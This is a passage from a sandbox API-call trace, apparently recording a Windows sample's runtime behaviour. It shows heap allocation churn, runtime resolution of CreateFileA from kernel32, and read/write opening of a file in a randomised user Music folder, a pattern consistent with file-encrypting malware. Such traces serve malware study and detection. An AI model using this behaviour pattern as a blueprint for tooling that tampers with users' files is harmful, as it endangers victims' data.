lpMsg=0x87f3fc) returned 0 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0184.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0184.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0184.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0184.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0184.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0184.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0184.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0184.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0184.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0184.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0184.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0184.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0184.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0184.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0184.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0184.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0184.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0184.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0184.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0184.721] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0184.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0184.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0184.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0184.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0184.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0184.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0184.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.724] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0184.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0184.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bdab0 [0184.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bdab0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0184.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.725] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0184.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0184.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0184.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0184.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bdab0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0184.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.726] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0184.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0184.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0184.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0184.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0184.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0184.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0184.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0184.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a", cchWideChar=88, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 88 [0184.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x58) returned 0x8c4a48 [0184.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a", cchWideChar=88, lpMultiByteStr=0x8c4a48, cbMultiByte=88, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a", lpUsedDefaultChar=0x0) returned 88 [0184.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0184.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0184.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0184.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0184.728] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\snzbfu-3qx.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0184.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0184.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0184.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0184.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0184.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0184.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0184.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0184.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0184.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=88, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0184.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0184.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=88, lpWideCharStr=0x8e6cd8, cchWideChar=88 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a") returned 88 [0184.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0184.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0184.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0184.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0184.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0184.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0184.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0184.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0184.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 